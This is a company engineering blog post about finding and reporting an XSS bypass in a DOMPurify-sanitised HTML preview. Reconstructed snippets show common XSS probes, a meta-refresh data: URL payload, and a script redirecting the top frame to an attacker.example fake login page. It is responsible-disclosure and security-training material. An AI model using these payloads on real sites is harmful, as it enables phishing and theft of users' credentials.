The war on security bugs

Vályi Péter
Published in Emarsys Craftlab
Jun 16, 2021


At Emarsys, we pay close attention to keeping our customers’ data safe. Our uncommonly attractive security team constantly keeps its eyes on application security, works proactively to prevent data breaches, investigates attacks, and the list goes on. In this post, I’d like to tell you a bit about how we approach security in the company and share the story of how I caught a bug in our system.

As a company in a highly dynamic market, with more than 200 developers working simultaneously, things tend to happen fast and the rate at which new code is produced is enormous. It is virtually impossible for one team to oversee and control every piece of new code before it is released to production. Hence, the security team emphasises that each and every developer should have security in mind when developing new features. That’s why we have internal hands-on web security workshops, where developers learn about various security vulnerabilities (SQL injection, XSS, XXE and so on) and try to use this knowledge to catch bugs in time. The security team also provides guidelines, checklists and various other materials to help prevent security issues.

This is a battle where all of us have to grab a sword and tackle these sneaky bugs head-on. This is not an easy task, especially if you are accustomed to having this part of the work outsourced to external security firms, which was the common way of doing things at my previous jobs. As we were mostly using the waterfall model, this is what we did: at some point before the release, the software was made available to the security firm. They analyzed the source code, ran several penetration tests and returned a report with their findings. Then we fixed these security holes, and hopefully learned not to create them in the first place next time.

The issue with this workflow is that we didn’t really stop development after the security checkup. There were always new features added later, bugs fixed, and so on. What about the new security issues introduced in these additions? We never had them checked. In the age of continuous delivery this is not a sustainable method. It is safer and more effective to look for security issues and eliminate them in every single commit.

For me personally, this meant looking at development from a different perspective. Usually, I had been focusing on how to make things work. Now I had to incorporate the opposite: how to make things break, how to bend things into doing something other than their intended purpose.

Enemy spotted

Our team develops a product called Web Channel, which allows our customers to easily enrich their websites with custom HTML content. One day, we started working on a shiny new feature that would let users see a live preview of the HTML content being edited. The preview would be shown next to the code, right on the page. For this, we would use a new UI component that had the preview functionality.

On the left: the HTML source; on the right: the live preview

I thought to myself: this is exactly the kind of place where nasty things can happen. Could I maybe add some code to the HTML so that the preview would evaluate it? If so, it would be a perfect place for XSS. Let’s try it out quickly!
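The original attempt isn’t reproduced in the post; the most basic probe would be something like this:

```html
<script>alert(1)</script>
```

A bare script tag is the first thing any sanitizer catches, so this failing is no surprise.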

No luck of course, it’s not that easy! Let’s try some different tricks:
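The tried payloads aren’t shown in the post; typical next attempts avoid the script tag entirely and rely on event handlers and other script-less vectors, for example:

```html
<img src="x" onerror="alert(1)">
<svg onload="alert(1)"></svg>
<iframe src="javascript:alert(1)"></iframe>
```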

There are lots of techniques like these. I tried a couple of them, but no luck. It was time to investigate what was happening behind the scenes and come up with more specific attacks. I looked at the HTML generated in the preview:

Sanitized code in the preview
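The screenshot isn’t reproduced here, but the effect looks like this: an injected `<img src="x" onerror="alert(1)">`, for instance, comes back with its event handler stripped (illustrative output):

```html
<!-- input:  <img src="x" onerror="alert(1)"> -->
<!-- output after sanitization: -->
<img src="x">
```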

It seems that the injected onerror code was completely removed. Some kind of HTML sanitization must have been used to achieve this. I also noticed that the preview lives in an iframe, but let’s talk about that later. I started to dig deeper into the source code.

Gathering intel

The preview component uses a third-party HTML sanitizer called DOMPurify. It parses the input HTML and removes any malicious code; the clean HTML is then inserted into the DOM. A tough nut to crack. But I still had some directions to go from here:

  • what if DOMPurify is used or configured incorrectly?
  • what if DOMPurify itself has a vulnerability?
  • what if a bug was fixed in DOMPurify, but we use an earlier version of it?
  • is there any way to bypass the sanitization (maybe a forgotten feature switch)?

It turned out that the component uses an interesting bit of configuration:
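The configuration itself isn’t reproduced in the post; based on the description that follows, it presumably resembled this sketch (only the meta tag is confirmed by the story; everything else here is an assumption):

```javascript
// Hypothetical reconstruction of the component's sanitizer call.
// ADD_TAGS tells DOMPurify to keep these tags in the output instead of
// stripping them; their attributes are still sanitized as usual.
const clean = DOMPurify.sanitize(dirtyHtml, {
  ADD_TAGS: ['meta'],
});
```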

Some tags are explicitly added to the configuration. This means that although DOMPurify will sanitize these tags, they won’t be removed entirely. What especially caught my attention was the meta HTML tag. Could I inject code into it? After some googling, it turned out that it is indeed possible:
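The payload from the post isn’t shown; the known trick abuses a meta refresh that points at a data: URL. The base64 value below is a placeholder that encodes `<script>alert(1)</script>`:

```html
<meta http-equiv="refresh"
  content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
```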

Basically, this causes the browser to refresh, but instead of loading a regular URL, the browser renders the data: URL from the content attribute, which is a base64-encoded version of this snippet:
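The snippet itself isn’t reproduced; as a stand-in, assume a simple proof-of-concept alert, with the base64 encoding done in Node.js:

```javascript
// Illustrative stand-in for the injected snippet (the original isn't shown).
const snippet = '<script>alert(document.domain)</script>';

// This base64 string is what goes into the meta tag's content attribute.
const b64 = Buffer.from(snippet, 'utf8').toString('base64');
console.log(b64);
```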

And it ran successfully! The code was executed where it wasn’t supposed to. This is a success in itself, but can someone really exploit this fact? Can it actually cause harm?

Victims of the war

As I wrote earlier, the preview lives inside an iframe; more specifically, a cross-origin iframe with no sandbox attribute present. To do malicious things, the script would need to access the top frame (the parent frame). In modern, secure browsers the top frame is mostly protected from meddling, but there are exceptions. I found out that this snippet worked in Firefox:
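The exact snippet isn’t shown; navigating the top frame from the injected page would look something like this (the destination URL is a placeholder):

```html
<script>
  // From inside a cross-origin iframe that lacks a sandbox attribute,
  // some browsers (here: Firefox) still allow navigating the top frame.
  top.location = 'https://attacker.example/fake-login';
</script>
```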

So this way, I could redirect potential victims to an arbitrary webpage. That was indeed “good news” for me, as I could now do almost anything to the users. For example, I could create a page that mimics the login page and steal credentials, which is a common way to exploit this kind of vulnerability.

Fighting back

This was the story of how I found a security vulnerability in our system. What’s the next step? Obviously I had to fight back; in other words, it was time to eliminate the bug. I informed the security team and the team developing the preview component of my findings, detailed the steps for easy reproduction, and made suggestions on how to fix the bug. It was fixed soon after.

The moral of the story: it is our duty as developers to have a security mindset when we code. We should educate and train ourselves to be able to spot security bugs early on. For some, this might mean they have to change their usual perspective. Let’s fight back!
